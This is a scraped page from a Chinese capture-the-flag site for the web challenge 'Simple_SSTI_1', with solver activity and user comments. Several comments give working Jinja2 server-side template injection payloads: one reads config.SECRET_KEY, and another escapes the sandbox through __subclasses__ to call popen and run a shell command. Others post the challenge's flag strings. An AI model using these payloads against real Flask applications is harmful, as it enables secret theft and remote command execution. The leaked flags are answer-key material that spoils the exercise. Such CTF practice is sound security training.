Simple_SSTI_1WEB 未解决
分数:
5
金币:
2
题目作者:
valecalida
一 血:
dotast
一血奖励:
2金币
解 决:
27942
提 示:
描 述:
Simple_SSTI_1
评分(49)
解题动态
wbbcw 攻破了该题 3小时前
ifnoif 攻破了该题 3小时前
lihonglin 攻破了该题 9小时前
jsc111 攻破了该题 10小时前
1370446421 攻破了该题 1天前
2990314400 攻破了该题 3天前
locust 攻破了该题 4天前
晴天1 攻破了该题 4天前
2323277194 攻破了该题 5天前
zhiyin 攻破了该题 5天前
bugku111rao 攻破了该题 5天前
carol111 攻破了该题 5天前
R3dH0wk 攻破了该题 7天前
llzhengzhisheng 攻破了该题 7天前
Fahai 攻破了该题 8天前
zcailss 攻破了该题 8天前
asusbugku 攻破了该题 8天前
pbfaljx 攻破了该题 8天前
lw18352271922 攻破了该题 8天前
评论
ccsuaw 11月前
举报
SECRET_KEY是什么? SECRET_KEY其实就是一个加密盐,用在django和flask的session、cookies等加密中。 所以payload为?flag={{config.SECRET_KEY}} 为什么是config.SECRET_KEY? 因为一般定义SECRET_KEY的config.py的源码是这样的: class Config(objec
18483555203 11月前
举报
flag{16346b3ff029db0cedd2d4d2df81df5a}
2027347950 11月前
举报
?flag={{''.__class__.__base__.__subclasses__()[127].__init__.__globals__['popen']('echo $FLAG').read()}}
iii1 12月前
举报
?flag={{''.__class__.__base__.__subclasses__()[127].__init__.__globals__['popen']('echo $FLAG').read()}}
DragonWE 12月前
举报
flag{9c260fb48e0a0db7708b6f3ebe9ff732}
iain4048 1年前
举报
查看源代码提示找secret key value
13663536751 1年前
举报
flag{e0ad0234936fcd15f11c7bb0f9d587e7}
2346254613 1年前
举报
这个是答案吗
啊这这 1年前
举报
使用{{config}}获得flag,因为config是用来获取当前配置的,配置主要有cookie名字和值之类的,这里的flag就是存放在cookie中(个人理解,如果不对请矫正)
avengert 1年前
举报
你们这么泄题,一会儿不得刷一轮儿了啊。
xbhgg 1年前
举报
大神们怎么知道的参数里面放的是config。。。